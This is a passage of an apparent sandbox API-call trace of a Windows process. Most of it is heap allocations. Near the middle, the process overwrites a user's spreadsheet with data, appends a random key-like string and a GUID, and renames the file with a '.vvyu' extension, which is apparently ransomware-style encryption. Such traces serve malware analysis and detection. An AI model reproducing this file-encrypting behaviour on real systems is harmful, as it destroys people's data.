[0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.839] GetCurrentThreadId () returned 0x66c [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8358 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.840] GetCurrentThreadId () returned 0x66c [0200.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0200.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0200.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0200.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0200.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fb70 | out: hHeap=0x620000) returned 1 [0200.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0200.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.851] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x5266, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x5266, lpOverlapped=0x0) returned 1 [0200.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.852] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x526b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.852] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.853] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.854] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.854] CloseHandle (hObject=0x510) returned 1 [0200.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0200.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0200.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0200.856] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\Wa_4PK0L7JwGQV.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\wa_4pk0l7jwgqv.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\Wa_4PK0L7JwGQV.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\wa_4pk0l7jwgqv.xlsx.vvyu")) returned 1 [0200.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.858] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.861] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2d8890, ftCreationTime.dwHighDateTime=0x1d898b0, ftLastAccessTime.dwLowDateTime=0xc817e230, ftLastAccessTime.dwHighDateTime=0x1d899ad, ftLastWriteTime.dwLowDateTime=0xc817e230, ftLastWriteTime.dwHighDateTime=0x1d899ad, nFileSizeHigh=0x0, nFileSizeLow=0x526b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wa_4PK0L7JwGQV.xlsx", cAlternateFileName="WA_4PK~1.XLS")) returned 0 [0200.861] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0200.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0200.862] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0200.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0200.862] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0200.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 